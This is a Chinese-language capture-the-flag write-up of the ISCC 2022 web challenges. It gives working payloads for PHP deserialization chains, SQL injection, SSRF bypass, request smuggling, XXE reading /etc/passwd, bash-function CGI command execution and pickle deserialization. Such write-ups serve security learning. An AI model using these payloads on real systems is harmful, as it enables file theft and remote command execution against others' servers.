2022ISCC-web
除了0解的爱国敬业好青年1,其他都写出来了,wp写的有点简单,有问题欢迎提问
冬奥会
传入一个json字符串,第一个键为year,且值不为数字
if(is_array(@$info["items"])){
if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
$status = array_search("skiing", $info["items"]);
$status===false?die("Sorry~"):NULL;
foreach($info["items"] as $key=>$val){
$val==="skiing"?die("Sorry~"):NULL;
}
$Step2=True;
}
第二个键为items,利用函数接入到了不符合的类型返回“0”,使用二维数组进行绕过
poc
?Information={"year":"a","items":[0,[],"a"]}
爱国敬业好青年2
5.10为共青团成立100周年,猜测坐标为天安门,进入/flag页面,post提交经纬度即可得到flag
post提交
lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N
Pop2022
目标为include。可以使用php伪协议来读取并输出文件。
poc:
<?php
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
//echo 'Road_is_Long__construct';
$this->page = $file;
}
public function __toString(){
echo '__toString';
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var='php://filter/read=convert.base64-encode/resource=/flag.php';
public function append($value){
echo 'append';
include($value);
}
public function __invoke(){
echo '__invoke';
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
//echo 'Make_a_Change__construct';
$this->effort = array();
}
public function __get($key){
echo '__get';
$function = $this->effort;
return $function();
}
}
$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard();
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a));
?>
ISCC{lets_pop_your_2022}
Easy-SQL
?id=-8 union table emails limit 7,1#
获得源码
在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据
username=0’ union select 1,0x61646d696e,3#&passwd=3
findme
简单的php原生类利用
http://59.110.159.206:8030/unser.php
先使用伪协议获取hint.php,得知flag大概位置
<?php
class a{
public $un0;
public $un1;
public $un2="php://filter/convert.base64-encode/resource=";
public $un3;
public $un4;
}
$payload=new a();
echo serialize($payload);
poc直接打获得flag文件
<?php
class a{
public $un0="DirectoryIterator";
public $un1="glob:///var/www/html/f*.txt";
public $un2;
public $un3="unserialize";
public $un4="abc";
}
$a=new a();
echo serialize($a);
让我康康!
一个搜索框,提示我们访问fl4g页面,访问后返回403页面,我们尝试一下使用HTTP请求走私漏洞访问fl4g页面,提示需要来自本地
配合搜索框,发现由前端重写的请求包会被反馈在响应中,需要post提交数据,添加CT字段,成功通过HTTP请求走私漏洞获取到了前端服务器用来指定来源IP的字段名,我们就可以伪造成本地用户了
最终获得flag
这是一道代码审计题
访问index构造请求url=1,获得报错页面,查看源码
访问此文件,发现emoji编码的源码,
进行解码,获得源代码
def geneSign():
if(control_key==1):
return render_template("index.html")
else:
return "You have not access to this page!"
def check_ssrf(url):
hostname = urlparse(url).hostname
try:
if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
raise BaseException("url format error")
if re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if judge_ip(hostname):
return True
return False, "You not get the right clue!"
else:
ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
if is_inner_ipaddress(ip_address):
return False,"inner ip address attack"
else:
return False, "You not get the right clue!"
except BaseException as e:
return False, str(e)
except:
return False, "unknow error"
def ip2long(ip_addr):
return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
ip = ip2long(ip)
print(ip)
return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
forbidden_list = [ '.', '0', '1', '2', '7']
for word in forbidden_list:
if ip and word:
if word in ip.lower():
return True
return False
def judge_ip(ip):
if(waf1(ip)):
return Fasle
else:
addr = addr.encode(encoding = "utf-8")
ipp = base64.encodestring(addr)
ipp = ipp.strip().lower().decode()
if(ip==ipp):
global control_key
control_key = 1
return True
else:
return False
构造请求http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x
绕过ssrf限制,获得新提示
访问此目录,并抓包更改cookie为题目所给
登录到登录框界面,右键查看源代码,得到一串js源码
很明显要我们构造post数据包,存在xxe漏洞,构造如下
POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<user><name>&name;</name><password>admin</password></user>
成功读取文件
根据提示利用proc特性,proc/self/cwd/获取目标当前进程环境的运行目录与目录里的文件
读取proc/self/cwd/flag.txt文件得到flag
ping2rce
环境变量rce,可参考p牛的文章https://tttang.com/archive/1450/,直接构造poc即可命令执行
POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379
--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"
() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--
Melody
先随便登录一个用户,可以看到存在session认证
eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI
发现提示/info页面需要使用Melody浏览器登录,更改UA头为Melody即可
发现junjia2模板注入,查看配置信息,发现session_key,那我们接下来直接伪造session即可
获得key:meldoy-is-so-cute-wawawa!
然后使用脚本进行flask session伪造,替换session后登录成功
虚假的flag,发现一个py源文件,访问下载
代码如下
# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request
class register:
def __init__(self,name,password):
self.name = name
self.password = password
def __eq__(self, other):
return type(other) is register and self.name == other.name and self.password == other.password
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module[0:8] == '__main__':
return getattr(sys.modules['__main__'],name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def find(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/therealflag', methods=['GET','POST'])
def realflag():
if request.method == 'POST':
try:
data = request.form.get('melody')
if b'R' in base64.b64decode(data):
return 'no reduce'
else:
result = find(base64.b64decode(data))
if type(result) is not register:
return 'The type is not correct!'
correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
if correct:
if session['username'] == 'admin':
return Response(read('./flag.txt'))
else:
return Response("You're not admin!")
except Exception as e:
return Response(str(e))
test = register('admin', '123456')
data = base64.b64encode(pickle.dumps(test)).decode()
return Response(data)
pickle反序列化,写脚本,pker进行原变量覆盖文章来源:https://www.toymoban.com/news/detail-449761.html
import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))
文章来源地址https://www.toymoban.com/news/detail-449761.html
到了这里,关于2022ISCC-web-wp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[CTF]-ISCC2022复现](https://imgs.yssmx.com/Uploads/2024/02/425861-1.png)
![[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag](https://imgs.yssmx.com/Uploads/2024/02/516723-1.png)
